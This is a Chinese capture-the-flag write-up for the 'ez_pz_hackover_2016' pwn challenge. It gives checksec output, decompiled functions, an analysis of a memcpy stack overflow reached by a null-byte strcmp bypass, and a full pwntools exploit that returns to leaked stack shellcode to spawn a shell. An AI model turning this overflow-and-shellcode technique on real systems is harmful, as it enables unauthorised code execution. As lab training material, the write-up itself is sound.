ez pz hackover 2016
# ez pz hackover 2016
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/ez_pz_hackover_2016/ez_pz_hackover_2016'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
1
2
3
4
5
6
7
2
3
4
5
6
7
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdout, 0);
header();
chall();
return 0;
}
1
2
3
4
5
6
7
2
3
4
5
6
7
header函数如下
int header()
{
printf("\n");
printf(" ___ ____\n");
printf(" ___ __| _ \\_ /\n");
printf(" / -_)_ / _// / \n");
printf(" \\___/__|_| /___|\n");
printf(" lemon squeezy\n");
return printf("\n\n");
}
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
vuln函数如下
void *__cdecl vuln(char src, size_t n)
{
char dest; // [esp+6h] [ebp-32h]
return memcpy(&dest, &src, n);
}
1
2
3
4
5
6
2
3
4
5
6
chall函数如下
int chall()
{
size_t v0; // eax
int result; // eax
char s; // [esp+Ch] [ebp-40Ch]
_BYTE *v3; // [esp+40Ch] [ebp-Ch]
printf("Yippie, lets crash: %p\n", &s);
printf("Whats your name?\n");
printf("> ");
fgets(&s, 1023, stdin);
v0 = strlen(&s);
v3 = memchr(&s, 10, v0);
if ( v3 )
*v3 = 0;
printf("\nWelcome %s!\n", &s);
result = strcmp(&s, "crashme");
if ( !result )
result = vuln((unsigned int)&s, 0x400u);
return result;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# 思路分析
- 目前信息:
- 栈上
s地址已知 - 若输入
crashme可进入vuln函数 vuln函数可溢出- 无
system、/bin/sh及后门函数 - No canary found
- NX disabled
- No PIE
- Has RWX segments
- 栈上
- 思路:
- 利用
\x00绕过strcmp为vuln函数中的溢出创造条件,另将shellcode写入栈上s的地址,返回到shellcode处获得shell
- 利用
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/ez_pz_hackover_2016/ez_pz_hackover_2016'
# io = remote("node4.buuoj.cn", 26153)
io = process(pwnfile)
io.recvuntil('Yippie, lets crash: ')
stack_s_addr = int(io.recvuntil('\nWhats your name?\n', drop=True), 16)
padding = 0x1a
shellcode = asm(shellcraft.sh())
payload = b'crashme\x00'.ljust(padding, b'a')
# s距离ebp的偏移为0x1a
payload += flat([stack_s_addr-0x1c, shellcode])
# shellcode距离stack_s_addr的偏移为0x1c
io.sendafter('> ', payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
上次更新: 2022/08/15, 00:29:49